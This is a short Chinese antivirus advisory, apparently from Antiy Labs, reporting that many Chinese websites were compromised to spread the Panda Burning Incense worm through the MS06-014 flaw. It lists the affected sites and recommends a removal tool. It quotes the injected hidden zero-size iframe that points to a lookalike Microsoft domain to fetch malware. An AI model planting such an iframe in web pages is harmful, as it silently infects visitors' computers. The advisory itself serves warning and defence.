|
1月19号,安天实验室反病毒监测网发现,目前多个网站,遭到恶意攻击,用户如果访问这些网站,会被病毒感染。
截止16时整,部分统计如下:
hXXtp://www.fzzv.com/ (福州热线)
hXXp://hrway.cn/ (招聘求职网)
hXXp://www.myfdc.com.cn/building(绵阳房地产网站)
hXXp://kesum.cn/(开商网--中国商业零售门户网站)
hXXp://www.zewq.com (美图之家)
hXXp://www.wodown.com.cn/ (我的下载站)
hXXp://www.iq158.com
hXXp://www.ck816.com/
hXXp://www.nanti.cn/ (在线小游戏)
hXXp://www.510188.cn/ (QQ园)
hXXp://coosoon.com/index.htm (coosoon搜索)
hXXp://www.lalago.net (啦啦购)
hXXp://soft100.com.cn/ (百分百软件搜索站)
hXXp://www.downgame.com.cn (手机加油站)
hXXp://168.zg168.net (中国广告网(中国168)——中国最全的电子大黄页)
hXXp://www.17kx.net/ (在线小游戏)
hXXp://www.sfwzk.com/ (外挂网址库)
hXXp://www.tao168188.com/index.htm
hXXp://www.baofeng.com/(暴风影音官方网站)
攻击者利用MS06-014漏洞来传播木马,在这些网页中,都被植入了类似<iframe src=HXXP://WWW.MICR0SOFT.CN width=0 height=0></iframe>的跳转页句,一旦用户访问,则主机会在用户不知情的情况下自动链接到互联网,下载恶意程序。
此次事件,涉及到的病毒大部分为“熊猫烧香”。这是因为目前越来越多的攻击者使用在网页中植入“熊猫烧香”病毒。再利用其来下载其他恶意程序到受感染主机的攻击手法。熊猫烧香本身是一个具有强感染性的蠕虫,它可以利用局域网传播,因此感染范围非常广。危害巨大。
该病毒会感染系统中的重要文件,而被感染的文件手工修复困难,广大用户,如果感染该病毒,可以使用安天实验室发布的熊猫烧香病毒专杀工具KillPP,此专杀工具可以清除所有熊猫烧香病毒变种,可以恢复被感染的EXE文件,并附带U盘免疫功能。
安天实验室熊猫烧香病毒专杀工具下载地址为:http://www.antiy.com/download/KillPP.bat
|
内容:
病毒上报信箱: